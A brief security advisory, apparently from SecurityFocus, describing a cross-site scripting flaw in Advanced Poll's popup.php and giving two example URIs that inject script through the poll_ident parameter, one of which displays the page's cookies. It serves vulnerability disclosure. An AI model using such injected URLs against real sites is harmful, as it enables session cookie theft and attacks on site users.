Advanced Poll Popup.PHP Cross-Site Scripting Vulnerability

No exploit is required.

Example URIs have been provided:

http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert("hola vengo a flotar");</script>

http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert(document.cookie);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus